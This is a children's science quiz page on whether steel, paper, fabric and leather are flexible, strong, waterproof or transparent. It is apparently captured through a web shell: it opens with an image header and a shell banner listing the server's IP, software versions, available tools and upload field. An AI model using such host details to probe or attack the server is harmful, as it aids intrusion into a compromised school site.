????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelG/Category2/ |
Upload File : |
<!DOCTYPE html>
<html>
<head>
<title>Find out the qualities of the materials by experimenting - 1</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style type="text/css"></style>
<script>
function page_preLoad()
{
s_setDeviceTypeLevelCategoryLastLesson(Level.G, Category.No2);
s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.G, Category.No2, 13), true, true);
s_setFooterTable('id_tblFooter', true, true, true, true, true);
var ids_headings = ['id_td_heading1'];
var ids_texts = new Array();
for (var textId = 1; textId <= 16; textId++)
{
ids_texts.push('id_td_text' + textId);
ids_texts.push('id_td' + textId);
}
s_adjust_fontSize_for_ids_all_devices(ids_headings, 70);
s_adjust_fontSize_for_ids_all_devices(ids_texts, 80);
var id_tables_array = ['id_table1', 'id_table2', 'id_table3'];
s_border_collapse_for_tables_except_android(id_tables_array);
}
function page_onLoad()
{
}
function btnHome_click()
{
s_btnHomeCategories_click('LevelG');
}
function btnPrevious_click()
{
window.location = 'LevelGCat2Lesson12.html';
}
function btnNext_click()
{
window.location = 'LevelGCat2Lesson14.html';
}
function btnValidate_click()
{
var nCorrectChecked = 0;
var tickRequiredRadioButtonIdsArray = ['id_radioButton1_1', 'id_radioButton2_1', 'id_radioButton3_1', 'id_radioButton4_2', 'id_radioButton5_1', 'id_radioButton6_2', 'id_radioButton7_2', 'id_radioButton8_2', 'id_radioButton9_1', 'id_radioButton10_2', 'id_radioButton11_2', 'id_radioButton12_2', 'id_radioButton13_1', 'id_radioButton14_2', 'id_radioButton15_1', 'id_radioButton16_2'];
for (var index = 1; index <= 16; index++)
{
var id_radioButton = tickRequiredRadioButtonIdsArray[index - 1];
var eRadioButton = document.getElementById(id_radioButton);
var eTd = document.getElementById('id_td' + index);
eTd.style.background = eRadioButton.checked ? 'green' : 'red';
nCorrectChecked += eRadioButton.checked ? 1 : 0;
}
if (nCorrectChecked == 16)
{
s_show_claps_animation('s_id_div_message');
}
}
</script>
</head>
<body onLoad="page_onLoad()">
<div id="s_id_div_message"></div>
<table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%">
<tr height="*">
<td style="padding-bottom: 0px">
<table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr height="50%">
<td id="id_td_heading1" class="s_style_heading">Every material has some properties and characteristics.<br>
Find out the qualities of the following materials by experimenting.</td>
</tr>
</table>
</td>
</tr>
<tr height="46%">
<td style="padding-bottom: 0px">
<table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr height="10%">
<td id="id_td_text1" class="s_style_content_normal" width="50%" align="center">
<span>Steel</span>
</td>
<td id="id_td_text2" class="s_style_content_normal" width="*" align="center">
<span>Paper</span>
</td>
</tr>
<tr height="*">
<td width="50%" style="padding-left:2%">
<table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
<tr height="20%">
<td id="id_td_text3" width="*"> </td>
<td id="id_td_text4" class="s_style_textBlack_without_bold" width="15%" align="center">Yes</td>
<td id="id_td_text5" class="s_style_textBlack_without_bold" width="15%" align="center">No</td>
</tr>
<tr>
<td id="id_td1" class="s_style_textBlack_without_bold" width="*">Is it flexible?</td>
<td width="15%" align="center" >
<input id="id_radioButton1_1" type="radio" name="yesNo1">
</td>
<td width="15%" align="center">
<input id="id_radioButton1_2" type="radio" name="yesNo1">
</td>
</tr>
<tr>
<td id="id_td2" class="s_style_textBlack_without_bold" width="*">Is it strong?</td>
<td width="15%" align="center">
<input id="id_radioButton2_1" type="radio" name="yesNo2">
</td>
<td width="15%" align="center">
<input id="id_radioButton2_2" type="radio" name="yesNo2">
</td>
</tr>
<tr>
<td id="id_td3" class="s_style_textBlack_without_bold" width="*">Is it waterproof?</td>
<td width="15%" align="center">
<input id="id_radioButton3_1" type="radio" name="yesNo3">
</td>
<td width="15%" align="center">
<input id="id_radioButton3_2" type="radio" name="yesNo3">
</td>
</tr>
<tr>
<td id="id_td4" class="s_style_textBlack_without_bold" width="*">Is it transparent?</td>
<td width="15%" align="center">
<input id="id_radioButton4_1" type="radio" name="yesNo4">
</td>
<td width="15%" align="center">
<input id="id_radioButton4_2" type="radio" name="yesNo4">
</td>
</tr>
</table>
</td>
<td width="*" style="padding-left:2%">
<table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
<tr height="20%">
<td id="id_td_text6" width="*"> </td>
<td id="id_td_text7" class="s_style_textBlack_without_bold" width="15%" align="center">Yes</td>
<td id="id_td_text8" class="s_style_textBlack_without_bold" width="15%" align="center">No</td>
</tr>
<tr>
<td id="id_td5" class="s_style_textBlack_without_bold" width="*">Is it flexible?</td>
<td width="15%" align="center" >
<input id="id_radioButton5_1" type="radio" name="yesNo5">
</td>
<td width="15%" align="center">
<input id="id_radioButton5_2" type="radio" name="yesNo5">
</td>
</tr>
<tr>
<td id="id_td6" class="s_style_textBlack_without_bold" width="*">Is it strong?</td>
<td width="15%" align="center">
<input id="id_radioButton6_1" type="radio" name="yesNo6">
</td>
<td width="15%" align="center">
<input id="id_radioButton6_2" type="radio" name="yesNo6">
</td>
</tr>
<tr>
<td id="id_td7" class="s_style_textBlack_without_bold" width="*">Is it waterproof?</td>
<td width="15%" align="center">
<input id="id_radioButton7_1" type="radio" name="yesNo7">
</td>
<td width="15%" align="center">
<input id="id_radioButton7_2" type="radio" name="yesNo7">
</td>
</tr>
<tr>
<td id="id_td8" class="s_style_textBlack_without_bold" width="*">Is it transparent?</td>
<td width="15%" align="center">
<input id="id_radioButton8_1" type="radio" name="yesNo8">
</td>
<td width="15%" align="center">
<input id="id_radioButton8_2" type="radio" name="yesNo8">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="46%">
<td>
<table id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
<tr height="10%">
<td id="id_td_text9" class="s_style_content_normal" width="50%" align="center">
<span>Fabric</span>
</td>
<td id="id_td_text10" class="s_style_content_normal" width="*" align="center">
<span>Leather</span>
</td>
</tr>
<tr height="*">
<td width="50%" style="padding-left:2%">
<table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
<tr height="20%">
<td id="id_td_text11" width="*"> </td>
<td id="id_td_text12" class="s_style_textBlack_without_bold" width="15%" align="center">Yes</td>
<td id="id_td_text13" class="s_style_textBlack_without_bold" width="15%" align="center">No</td>
</tr>
<tr>
<td id="id_td9" class="s_style_textBlack_without_bold" width="*">Is it flexible?</td>
<td width="15%" align="center" >
<input id="id_radioButton9_1" type="radio" name="yesNo9">
</td>
<td width="15%" align="center">
<input id="id_radioButton9_2" type="radio" name="yesNo9">
</td>
</tr>
<tr>
<td id="id_td10" class="s_style_textBlack_without_bold" width="*">Is it strong?</td>
<td width="15%" align="center">
<input id="id_radioButton10_1" type="radio" name="yesNo10">
</td>
<td width="15%" align="center">
<input id="id_radioButton10_2" type="radio" name="yesNo10">
</td>
</tr>
<tr>
<td id="id_td11" class="s_style_textBlack_without_bold" width="*">Is it waterproof?</td>
<td width="15%" align="center">
<input id="id_radioButton11_1" type="radio" name="yesNo11">
</td>
<td width="15%" align="center">
<input id="id_radioButton11_2" type="radio" name="yesNo11">
</td>
</tr>
<tr>
<td id="id_td12" class="s_style_textBlack_without_bold" width="*">Is it transparent?</td>
<td width="15%" align="center">
<input id="id_radioButton12_1" type="radio" name="yesNo12">
</td>
<td width="15%" align="center">
<input id="id_radioButton12_2" type="radio" name="yesNo12">
</td>
</tr>
</table>
</td>
<td width="*" style="padding-left:2%">
<table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
<tr height="20%">
<td id="id_td_text14" width="*"> </td>
<td id="id_td_text15" class="s_style_textBlack_without_bold" width="15%" align="center">Yes</td>
<td id="id_td_text16" class="s_style_textBlack_without_bold" width="15%" align="center">No</td>
</tr>
<tr>
<td id="id_td13" class="s_style_textBlack_without_bold" width="*">Is it flexible?</td>
<td width="15%" align="center" >
<input id="id_radioButton13_1" type="radio" name="yesNo13">
</td>
<td width="15%" align="center">
<input id="id_radioButton13_2" type="radio" name="yesNo13">
</td>
</tr>
<tr>
<td id="id_td14" class="s_style_textBlack_without_bold" width="*">Is it strong?</td>
<td width="15%" align="center">
<input id="id_radioButton14_1" type="radio" name="yesNo14">
</td>
<td width="15%" align="center">
<input id="id_radioButton14_2" type="radio" name="yesNo14">
</td>
</tr>
<tr>
<td id="id_td15" class="s_style_textBlack_without_bold" width="*">Is it waterproof?</td>
<td width="15%" align="center">
<input id="id_radioButton15_1" type="radio" name="yesNo15">
</td>
<td width="15%" align="center">
<input id="id_radioButton15_2" type="radio" name="yesNo15">
</td>
</tr>
<tr>
<td id="id_td16" class="s_style_textBlack_without_bold" width="*">Is it transparent?</td>
<td width="15%" align="center">
<input id="id_radioButton16_1" type="radio" name="yesNo16">
</td>
<td width="15%" align="center">
<input id="id_radioButton16_2" type="radio" name="yesNo16">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
</script>
</body>
</html>